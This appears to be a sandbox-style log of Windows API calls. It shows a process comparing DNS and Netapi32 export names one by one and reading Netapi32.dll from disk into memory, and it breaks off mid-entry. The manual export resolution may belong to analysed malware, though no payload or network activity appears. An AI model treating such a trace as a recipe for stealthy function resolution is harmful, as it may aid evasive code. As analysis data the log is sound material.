[0132.356] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0132.356] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.356] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0132.356] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0132.356] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0132.356] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.356] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.356] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0132.356] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0132.356] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.356] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0132.356] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0132.356] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0132.356] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0132.356] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.356] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.357] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0132.357] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0132.357] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.357] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0132.357] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0132.357] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0132.357] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.357] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0132.357] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.357] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.357] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0132.357] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0132.357] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.357] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0132.357] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0132.357] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0132.357] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.357] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0132.357] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0132.357] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.357] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.357] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0132.357] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0132.357] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.357] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0132.357] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0132.357] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0132.357] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.357] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0132.357] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0132.357] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0132.358] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.358] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0132.359] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0132.359] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.359] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0132.359] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0132.359] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0132.359] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.507] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0132.508] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0132.508] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0132.509] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0132.509] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.509] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0132.509] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0132.509] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0132.509] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0132.509] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0132.509] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0132.509] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0132.509] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0132.509] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0132.510] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0132.511] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0132.511] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0132.511] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0132.511] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0132.511] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0132.511] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0132.512] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0132.519] GetProcessHeap () returned 0x460000 [0132.520] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x39ed010 | out: hHeap=0x460000) returned 1 [0132.520] GetProcessHeap () returned 0x460000 [0132.520] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x479090 [0132.520] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0132.536] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0132.536] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0132.536] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0132.536] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0132.536] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0132.536] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0132.536] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0132.537] GetProcessHeap () returned 0x460000 [0132.537] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13b00) returned 0x2cb5030 [0132.537] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0132.537] ReadFile (in: hFile=0x17c, lpBuffer=0x2cb5030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cb5030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0132.537] CloseHandle (hObject=0x17c) returned 1 [0132.537] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0132.537] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0132.537] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0132.538] lstrcmpA (lpString1="NetAccessAdd", 